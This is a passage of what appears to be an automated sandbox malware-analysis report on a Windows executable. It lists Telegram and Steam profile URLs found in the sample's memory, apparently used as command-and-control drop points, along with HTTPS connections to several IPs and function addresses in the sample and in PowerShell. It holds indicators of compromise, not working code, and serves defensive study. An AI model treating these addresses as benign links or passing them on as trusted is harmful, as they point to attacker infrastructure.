Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/V
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/i
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://t.me/m
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000000.2483022637.000000000045C000.00000008.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000077B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871345979.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drString found in binary or memory: https://t.me/m3wm0w
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w%
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w(
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w8
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wl
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drString found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ows
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptchaL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49958 version: TLS 1.2

System Summary

barindex
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,15_2_00401625
Source: C:\Users\user\Desktop\YYjRtxS70h.exeCode function: 0_2_02AD0A400_2_02AD0A40
Source: C:\Users\user\Desktop\YYjRtxS70h.exeCode function: 0_2_02AD23090_2_02AD2309
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02B0B4904_2_02B0B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02B0B4704_2_02B0B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0339B49011_2_0339B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08D13E9811_2_08D13E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D3B49014_2_02D3B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D3B47014_2_02D3B470
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043E89315_2_0043E893
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C09115_2_0040C091
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E0A115_2_0040E0A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043014115_2_00430141
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E16115_2_0040E161
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044010115_2_00440101
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C11115_2_0042C111
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C12115_2_0040C121
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C1C115_2_0040C1C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004401C115_2_004401C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004121E115_2_004121E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A18115_2_0040A181
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043025115_2_00430251
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C26115_2_0040C261
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A22115_2_0040A221
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C22115_2_0042C221
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E23115_2_0040E231
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004122A115_2_004122A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041235115_2_00412351
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E30115_2_0040E301
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043031115_2_00430311
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044031115_2_00440311
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C32115_2_0042C321
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A33115_2_0040A331
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004103C115_2_004103C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C3C115_2_0042C3C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004123F115_2_004123F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E3F115_2_0040E3F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C38115_2_0040C381
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A41115_2_0040A411
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C42115_2_0040C421
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004104D115_2_004104D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004404D115_2_004404D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004144E115_2_004144E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E4A115_2_0040E4A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004124B115_2_004124B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041057115_2_00410571
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E57115_2_0040E571
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C51115_2_0042C511
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A52115_2_0040A521
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C53115_2_0040C531
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A5C115_2_0040A5C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E64115_2_0040E641
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044061115_2_00440611
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041062115_2_00410621
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C63115_2_0040C631
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C6C115_2_0042C6C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004106D115_2_004106D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C6D115_2_0040C6D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A6B115_2_0040A6B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A77115_2_0040A771
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044070115_2_00440701
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E71115_2_0040E711
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004327C115_2_004327C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C78115_2_0042C781
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004127A115_2_004127A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004107A115_2_004107A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044081115_2_00440811
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C82115_2_0040C821
